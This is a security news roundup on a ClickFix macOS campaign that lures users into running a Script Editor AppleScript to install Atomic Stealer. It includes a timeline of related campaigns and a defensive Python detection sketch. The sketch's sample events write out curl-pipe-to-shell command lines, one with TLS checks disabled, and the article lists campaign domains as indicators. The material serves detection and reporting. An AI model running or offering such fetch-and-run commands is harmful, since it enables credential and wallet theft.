ClickFix macOS Campaign Abuses Script Editor to Deploy Atomic Stealer
Researchers identified a ClickFix-style campaign targeting macOS users that swaps Terminal-based execution for Script Editor to bypass newer Apple protections. Victims are lured to fake Apple-themed pages such as “Reclaim disk space on your Mac,” which invoke the applescript:// URL scheme and open Script Editor with a pre-filled AppleScript. If the user runs it, the script conceals a malicious shell command that decodes a URL, uses curl with TLS certificate validation disabled, and pipes the response directly into zsh for in-memory execution.
The activity, discovered by Jamf Threat Labs, ultimately downloads and launches a Mach-O variant of Atomic Stealer, an infostealer built to harvest browser credentials, saved passwords, cryptocurrency wallets, and other sensitive data from macOS systems. Researchers said the campaign appears to be an adaptation to Apple’s paste-command scanning protections added in macOS 26.4 for Terminal abuse; while newer macOS versions also warn about unidentified scripts, the attack can still succeed if users follow the prompts. Reported infrastructure tied to the campaign includes dryvecar.com, storage-fixes.squarespace.com, and cleanupmac.mssg.me.
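The execution chain described above (Script Editor as the parent, curl with certificate validation disabled, output piped straight into a shell) can be matched in process telemetry. The following is an added detection sketch, not code from Jamf or from this page; the event schema, field names, and sample events are constructed assumptions.

```python
import os
import shlex

# Assumed event schema (hypothetical): "parent" is the parent process name,
# "cmd" is the string handed to `sh -c`. The sample events are constructed.
SCRIPT_HOSTS = {"Script Editor", "osascript"}
SHELLS = {"sh", "bash", "zsh"}

def top_level_stages(cmd):
    """Split on pipes outside quotes and outside $(...); return token lists."""
    stages, buf, depth, quote = [], [], 0, None
    for ch in cmd:
        if quote:
            quote = None if ch == quote else quote
        elif ch in "'\"":
            quote = ch
        elif ch == "(":
            depth += 1
        elif ch == ")":
            depth = max(0, depth - 1)
        elif ch == "|" and depth == 0:
            stages.append("".join(buf))
            buf = []
            continue
        buf.append(ch)
    stages.append("".join(buf))
    return [shlex.split(s) for s in stages]

def curl_disables_tls(tokens):
    """Heuristic: --insecure, or 'k' inside a short-flag cluster such as -kfsSL."""
    return any(t == "--insecure" or (t.startswith("-") and t[1:].isalpha() and "k" in t)
               for t in tokens[1:])

def score_event(event):
    """Return the signals one process-exec event matches, in a fixed order."""
    signals = ["script-host-parent"] if event["parent"] in SCRIPT_HOSTS else []
    stages = top_level_stages(event["cmd"])
    for i, toks in enumerate(stages):
        if toks and os.path.basename(toks[0]) == "curl":
            if curl_disables_tls(toks):
                signals.append("curl-insecure")
            nxt = stages[i + 1] if i + 1 < len(stages) else []
            if nxt and os.path.basename(nxt[0]) in SHELLS:
                signals.append("curl-piped-to-shell")
    return signals

def is_clickfix_chain(event):
    """Alert only when all three signals coincide."""
    return len(score_event(event)) == 3

EVENTS = [  # constructed samples; the decode step is a stand-in, not the real one
    {"parent": "Script Editor", "cmd": 'curl -kfsSL "$(echo PLACEHOLDER | base64 -d)" | zsh'},
    {"parent": "Terminal", "cmd": "curl -fsSL https://example.com/install.sh | bash"},
    {"parent": "osascript", "cmd": "curl --insecure -o /tmp/out https://example.com/file"},
]
```

Requiring all three signals keeps ordinary installer one-liners typed into Terminal (the second sample) from alerting, while each signal on its own is still available from `score_event` for hunting.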

How this story unfolded
8 events from the most recent confirmed update back to the earliest known activity.
Researchers link campaign to supporting infrastructure
Analysis tied the campaign to infrastructure including dryvecar.com, storage-fixes.squarespace.com, and cleanupmac.mssg.me. The operation was described as targeting macOS users to steal browser credentials, saved passwords, cryptocurrency wallets, and other sensitive data.
Jamf Threat Labs identifies Atomic Stealer macOS campaign in the wild
Jamf researchers documented an active campaign delivering a variant of Atomic Stealer through Script Editor on macOS. They reported that the script fetched remote content with curl using disabled TLS certificate validation, executed it in memory, and ultimately downloaded a Mach-O payload.
Attackers shift ClickFix delivery from Terminal to macOS Script Editor
After Apple’s Terminal-focused protections, attackers adapted their technique by using the applescript:// URL scheme to open Script Editor with a pre-filled malicious AppleScript. The lure used fake Apple-themed disk cleanup pages to socially engineer users into running the script.
Apple adds Terminal paste-scanning protections in macOS 26.4
Apple introduced protections in macOS 26.4 to scan pasted commands in Terminal and warn users about potentially suspicious activity. The new safeguards were intended to reduce abuse of Terminal-based social engineering techniques such as ClickFix-style attacks.
Netskope identifies separate ClickFix macOS campaign targeting Asian finance
Netskope Threat Labs reported an active ClickFix campaign targeting macOS users in Asia’s finance sector with an AppleScript-based infostealer. The attack used fake CAPTCHA prompts to trick victims into pasting a malicious curl command, then displayed a persistent fake macOS password dialog to steal valid credentials and extensive browser, Keychain, extension, and cryptocurrency wallet data.
Guardio reports fake 'Mac Storage Fix' Google Ads scam targeting macOS users
Guardio published research on a scam using fake 'Mac Storage Fix' lures promoted via Google Ads to target macOS users. The campaign appears to be an earlier stage of the social-engineering activity later associated with ClickFix-style macOS malware delivery.
Intego reports Matryoshka ClickFix macOS stealer via typosquatting
Intego reported a new 'Matryoshka' ClickFix variant targeting macOS users through typosquatting infrastructure to deliver a stealer. The report indicates the campaign was already using ClickFix-style social engineering against Mac users before the later Google Ads and Script Editor activity documented by other researchers.
Microsoft traces ClickFix macOS activity back to January 2026
Microsoft Defender researchers reported that ClickFix had been targeting macOS users since at least January 2026, marking an expansion of the technique beyond Windows. The campaign used fake disk-space, error, and utility-install prompts on blogs and user-driven platforms to trick users into pasting Terminal commands that delivered Macsync, Shub Stealer, or Atomic macOS Stealer.
Sources
ClickFix Campaign Evolves With Targeting Of MacOS Users (thecyberexpress.com)
MacOS ClickFix attacks deliver AppleScript stealers (theregister.com)
ClickFix campaign delivers Mac malware via fake Apple page - Help Net Security (helpnetsecurity.com)
Atomic Stealer malware abuses macOS Script Editor in new ClickFix attack | brief | SC Media (scworld.com)
New ClickFix Campaign Uses macOS Script Editor to Deliver Atomic Stealer (cybersecuritynews.com)
ClickFix-Style MacOS Attack Uses Script Editor Trick (thecyberexpress.com)
ClickFix Malware Uses macOS Script Editor to Deliver Atomic Stealer | Jamf Threat Labs (jamf.com)
Googled a Mac Storage Fix Lately? It May Be a Scam (guard.io)
Unpacking the New “Matryoshka” ClickFix Variant: Typosquatting Campaign Delivers macOS Stealer - The Mac Security Blog (intego.com)


